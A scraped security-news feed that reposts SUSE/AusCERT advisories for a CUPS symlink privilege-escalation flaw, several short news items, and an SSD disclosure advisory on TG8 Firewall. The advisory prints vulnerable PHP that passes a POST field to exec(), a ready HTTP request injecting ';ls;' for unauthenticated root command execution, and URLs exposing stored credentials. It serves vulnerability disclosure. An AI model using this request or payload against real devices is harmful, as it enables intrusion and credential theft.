cups-config-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Basesystem 15-SP3 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (aarch64 ppc64le s390x
x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (aarch64
x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (aarch64
x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (aarch64 x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (aarch64 x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Enterprise Storage 6 (aarch64 x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Enterprise Storage 6 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE CaaS Platform 4.0 (x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1

References:

o https://www.suse.com/security/cve/CVE-2021-25317.html
o https://bugzilla.suse.com/1184161

– ——————————————————————————–

SUSE Security Update: Security update for cups

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:14712-1
Rating: important
References: #1184161
Cross-References: CVE-2021-25317
Affected Products:
SUSE Linux Enterprise Server 11-SP4-LTSS
SUSE Linux Enterprise Point of Sale 11-SP3
SUSE Linux Enterprise Debuginfo 11-SP4
SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for cups fixes the following issues:

o CVE-2021-25317: ownership of /var/log/cups could allow privilege escalation
from lp user to root via symlink attacks (bsc#1184161)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Server 11-SP4-LTSS:
zypper in -t patch slessp4-cups-14712=1
o SUSE Linux Enterprise Point of Sale 11-SP3:
zypper in -t patch sleposp3-cups-14712=1
o SUSE Linux Enterprise Debuginfo 11-SP4:
zypper in -t patch dbgsp4-cups-14712=1
o SUSE Linux Enterprise Debuginfo 11-SP3:
zypper in -t patch dbgsp3-cups-14712=1

Package List:

o SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64):
cups-1.3.9-8.46.56.18.1
cups-client-1.3.9-8.46.56.18.1
cups-libs-1.3.9-8.46.56.18.1
o SUSE Linux Enterprise Server 11-SP4-LTSS (ppc64 s390x x86_64):
cups-libs-32bit-1.3.9-8.46.56.18.1
o SUSE Linux Enterprise Point of Sale 11-SP3 (i586):
cups-1.3.9-8.46.56.18.1
cups-client-1.3.9-8.46.56.18.1
cups-libs-1.3.9-8.46.56.18.1
o SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64):
cups-debuginfo-1.3.9-8.46.56.18.1
cups-debugsource-1.3.9-8.46.56.18.1
o SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):
cups-debuginfo-1.3.9-8.46.56.18.1
cups-debugsource-1.3.9-8.46.56.18.1

References:

o https://www.suse.com/security/cve/CVE-2021-25317.html
o https://bugzilla.suse.com/1184161

– ——————————————————————————–

SUSE Security Update: Security update for cups

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1453-1
Rating: important
References: #1184161
Cross-References: CVE-2021-25317
Affected Products:
SUSE OpenStack Cloud Crowbar 9
SUSE OpenStack Cloud Crowbar 8
SUSE OpenStack Cloud 9
SUSE OpenStack Cloud 8
SUSE Linux Enterprise Software Development Kit 12-SP5
SUSE Linux Enterprise Server for SAP 12-SP4
SUSE Linux Enterprise Server for SAP 12-SP3
SUSE Linux Enterprise Server 12-SP5
SUSE Linux Enterprise Server 12-SP4-LTSS
SUSE Linux Enterprise Server 12-SP3-LTSS
SUSE Linux Enterprise Server 12-SP3-BCL
SUSE Linux Enterprise Server 12-SP2-LTSS-SAP
SUSE Linux Enterprise Server 12-SP2-LTSS-ERICSSON
SUSE Linux Enterprise Server 12-SP2-BCL
HPE Helion Openstack 8
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for cups fixes the following issues:

o CVE-2021-25317: ownership of /var/log/cups could allow privilege escalation
from lp user to root via symlink attacks (bsc#1184161)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE OpenStack Cloud Crowbar 9:
zypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-1453=1
o SUSE OpenStack Cloud Crowbar 8:
zypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-1453=1
o SUSE OpenStack Cloud 9:
zypper in -t patch SUSE-OpenStack-Cloud-9-2021-1453=1
o SUSE OpenStack Cloud 8:
zypper in -t patch SUSE-OpenStack-Cloud-8-2021-1453=1
o SUSE Linux Enterprise Software Development Kit 12-SP5:
zypper in -t patch SUSE-SLE-SDK-12-SP5-2021-1453=1
o SUSE Linux Enterprise Server for SAP 12-SP4:
zypper in -t patch SUSE-SLE-SAP-12-SP4-2021-1453=1
o SUSE Linux Enterprise Server for SAP 12-SP3:
zypper in -t patch SUSE-SLE-SAP-12-SP3-2021-1453=1
o SUSE Linux Enterprise Server 12-SP5:
zypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-1453=1
o SUSE Linux Enterprise Server 12-SP4-LTSS:
zypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-1453=1
o SUSE Linux Enterprise Server 12-SP3-LTSS:
zypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-1453=1
o SUSE Linux Enterprise Server 12-SP3-BCL:
zypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-1453=1
o SUSE Linux Enterprise Server 12-SP2-LTSS-SAP:
zypper in -t patch SUSE-SLE-SERVER-12-SP2-LTSS-SAP-2021-1453=1
o SUSE Linux Enterprise Server 12-SP2-LTSS-ERICSSON:
zypper in -t patch SUSE-SLE-SERVER-12-SP2-LTSS-ERICSSON-2021-1453=1
o SUSE Linux Enterprise Server 12-SP2-BCL:
zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-1453=1
o HPE Helion Openstack 8:
zypper in -t patch HPE-Helion-OpenStack-8-2021-1453=1

Package List:

o SUSE OpenStack Cloud Crowbar 9 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE OpenStack Cloud Crowbar 8 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE OpenStack Cloud 9 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE OpenStack Cloud 8 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Software Development Kit 12-SP5 (aarch64 ppc64le
s390x x86_64):
cups-ddk-1.7.5-20.36.1
cups-ddk-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-devel-1.7.5-20.36.1
o SUSE Linux Enterprise Server for SAP 12-SP4 (ppc64le x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server for SAP 12-SP4 (x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server for SAP 12-SP3 (ppc64le x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server for SAP 12-SP3 (x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP5 (aarch64 ppc64le s390x x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP5 (s390x x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP4-LTSS (aarch64 ppc64le s390x x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP4-LTSS (s390x x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP3-LTSS (aarch64 ppc64le s390x x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP3-LTSS (s390x x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP3-BCL (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP2-LTSS-SAP (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP2-LTSS-ERICSSON (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o HPE Helion Openstack 8 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1

References:

o https://www.suse.com/security/cve/CVE-2021-25317.html
o https://bugzilla.suse.com/1184161

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYI9SVeNLKJtyKPYoAQg+7hAAqsFDRY6eMEYbYHWcU8aGqr4271gDdrTr
Y+/H/Hzy/R07KRrhaJ7M8lqqXYAQGQjz2HlZLPtW09VxYPwWto5pALyuIUPNo4Tm
Te4PbzZxCd/7RblOvgbjRVMbOLBVYuBZAZLs3FfOZkbEdSRbmYphmWcyLbDRf8wj
TGvmmbDWCzp+r980CLYy9IUmdUXhf/fh8U99OtDIzR21IHjbjUo2NEoTkDOIAbln
vxVIvz0yKJbxlowcjCEiv/N7uvvmKEN4Q4D5DDD5QvinsIZO51aSrzRcCSB2iI5Y
4ctfvHWpXfgX/wF+KW9qG6AuGRrBdC35KL3mQ9cx5LNjERE7P3PjR3yU+FH8AI7p
R6jEZLgFBGFVdTqnlfTU+yGt321HlsLiavk4dkSeBfoQnfr5FmJdI0kgYr7YrEqC
jSn3c2XuCWAjAhgaS6ZZeX2s8RI3FZpR6Da0UROgTgrsL71igJxcniFRzdwPGGvW
XarZIqUIW4VDnqiha5WrjxEiNQDj2gNej7KH6Vc8uwcYzBI+Xs23VKjSodrn5rKR
g8JB/Zzf0becR4gdJLDgVylyuSwXKg1jaYfW2xitaJ5LjwD8Ykry20qU/PygnwmN
WVYWf6KHycRA/q9yMyqWV3MLsA3axLNueCbvDsjiIQfDOk1X1naPTH+9piAjvK8I
HN25cLfIfIU=
=hlUL
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1492 – [Win][UNIX/Linux][SUSE] cups: Root compromise – Existing account appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/esb-2021-1492-winunix-linuxsuse-cups-root-compromise-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1492-winunix-linuxsuse-cups-root-compromise-existing-account

How to Solve the Cybersecurity Skills Gap

Understanding how to bridge the talent gap in the cybersecurity industry requires thinking beyond traditional approaches to recruiting. While there’s been progress, there is still room for organizations to evolve, which will require not only changing the way they think about hiring but the way hiring managers communicate with human resources. Yet many organizations continue..

The post How to Solve the Cybersecurity Skills Gap appeared first on Security Boulevard.

Read More

The post How to Solve the Cybersecurity Skills Gap appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/how-to-solve-the-cybersecurity-skills-gap/?utm_source=rss&utm_medium=rss&utm_campaign=how-to-solve-the-cybersecurity-skills-gap

Shlayer Strikes Again Through Zero-Day in MacOS 11.3

Apple this week revealed that its new macOS 11.3 update comes with a fix for a critical vulnerability – one that hackers actively exploited with Shlayer malware that can sidestep Apple defenses. The zero-day flaw, first discovered in March but likely in use by hackers since Jan. 9, allows unapproved software to run on Mac..

The post Shlayer Strikes Again Through Zero-Day in MacOS 11.3 appeared first on Security Boulevard.

Read More

The post Shlayer Strikes Again Through Zero-Day in MacOS 11.3 appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/shlayer-strikes-again-through-zero-day-in-macos-11-3/?utm_source=rss&utm_medium=rss&utm_campaign=shlayer-strikes-again-through-zero-day-in-macos-11-3

SSD Advisory – TG8 Firewall PreAuth RCE and Password Disclosure

TL;DR

Find out how vulnerabilities in TG8 Firewall allows remote unauthenticated users to execute arbitrary code on the remote device as well as disclose the passwords of existing accounts.

Vulnerability Summary

Two security vulnerabilities in TG8 Firewall have been found allowing a remote user to execute commands as root user without needing to authenticate with the device or have any privileged access, the second vulnerability allows to expose existing users’ passwords without being authenticated with the remote device.

CVE

Pending

Credit

An independent security researcher has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions
TG8 Firewall

Vendor Response

Numerous attempts to contact the vendor via Twitter, Facebook and Emails have not triggered any response from the vendor. We urge customers of this product to immediately block internet facing port 80/443 used for administering the device – it can be easily compromised.

Vulnerability Analysis

PreAuth RCE

The vulnerability exists in the way the authentication request is handled, due to which it leads to a remote command execution vulnerability with root user privileges. The data passed via user and password parameters is directly used as a parameter of a Linux command which allows command execution.

index.php source code

If you examine the index.php file you will notice that it calls a command called runphpcmd.php with a value of ‘sudo /home/TG8/v3/syscmd/check_gui_login.sh ‘ + username + ‘ ‘ + pass; this is very strange and very unusual, but what you should immediately notice its basically calling a command prefixed with sudo and examines the response to that command.

Obviously if we change the cmd being called we can theoretically execute any command, but lets first verify what runphpcmd.php does – as it may be filtering or limiting what commands can be run:

…
function checkLogin() {
var username = $(‘input[name=u]’).val();
var pass = $(‘input[name=p]’).val();
var cmd = ‘sudo /home/TG8/v3/syscmd/check_gui_login.sh ‘ + username + ‘ ‘ + pass;
$.ajax({
url: “runphpcmd.php”,
type: “post”,
dataType: “json”,
cache: “false”,
data: {
syscmd: cmd
},
success: function (x) {
if (x == ‘OK’) {
ok(username);
} else {
failed();
}
},
error: function () {
ok(username);
// alert(“failure to excute the command”);
}
})
}
…

runphpcmd.php source code

As can be seen in the source code of runphpcmd.php we can note that there is no verification of what syscmd is running and the outcome is returned in JSON format back to the caller of this file:

<?php
header(‘Content-Type: application/json’);
$response= array();
$output= array();
$cmd_1 = $_POST[‘syscmd’];
$data = ‘cmd= ‘.$cmd_1.”n”;
$fp = fopen(‘/opt/phpJS.log’, ‘a’);
fwrite($fp, $data);
exec($cmd_1,$output,$ret);
$data = ‘ output =’. json_encode($output).”n*******************************************************n”;
$fp = fopen(‘/opt/phpJS.log’, ‘a’);
fwrite($fp, $data);
$response[] = array(“result” => $output);
// Encoding array in JSON format
echo json_encode($output);
?>

Exploit

POST http://<server>/admin/runphpcmd.php HTTP/1.1
Host: Server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: keep-alive
syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+<command here>++local

The value passed via the parameter syscmd is not sanitized which leads to RCE

ex: ls Command executed in below request. Payload: ;ls;

syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bls%3B++local

The response for the above request will contain result for the command execution.

Password Disclosure

A folder that is insecurely accessible to remote unauthenticated users /data/ stores the credentials of previously logged on users. Since this folder doesn’t require any special access to access – enumerating the files that are located under it can be used to reveal accounts present on the TG8 Firewall.

Example URLs:

http://<server>/data/w-341.tg
http://<server>/data/w-342.tg
http://<server>/data/r-341.tg
http://<server>/data/r-342.tg
Read More

The post SSD Advisory – TG8 Firewall PreAuth RCE and Password Disclosure appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure/?utm_source=rss&utm_medium=rss&utm_campaign=ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure

Remembering Dan Kaminsky, Apple AirDrop Vulnerability

Remembering Dan Kaminsky who was one of the greatest security researchers of our time plus details on a new Apple Airdrop vulnerability. ** Links mentioned on the show ** Remembering Dan Kaminsky https://www.nytimes.com/2021/04/27/technology/daniel-kaminsky-dead.html Apple AirDrop Bug Could Leak Your Personal Info to Anyone Nearby https://thehackernews.com/2021/04/apple-airdrop-bug-could-leak-your.html https://www.komando.com/security-privacy/apple-airdrop-security-flaw/787628/ ** Watch this episode on YouTube ** https://youtu.be/N6T6qcRfTBA ** […]

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on The Shared Security Show.

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on Security Boulevard.

Read More

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/remembering-dan-kaminsky-apple-airdrop-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=remembering-dan-kaminsky-apple-airdrop-vulnerability

3 Best Practices for Customizing Your Compliance Program

Most large-scale entities need to prove compliance with multiple regulatory standards. In their efforts to meet their compliance mandates, organizations could suffer a major drain on their time and resources. This possibility holds true regardless of whether they’re finance companies, retailers, manufacturers or hospitality firms. Organizations face an additional obstacle when they have an internally […]… Read More

The post 3 Best Practices for Customizing Your Compliance Program appeared first on The State of Security.

The post 3 Best Practices for Customizing Your Compliance Program appeared first on Security Boulevard.

Read More

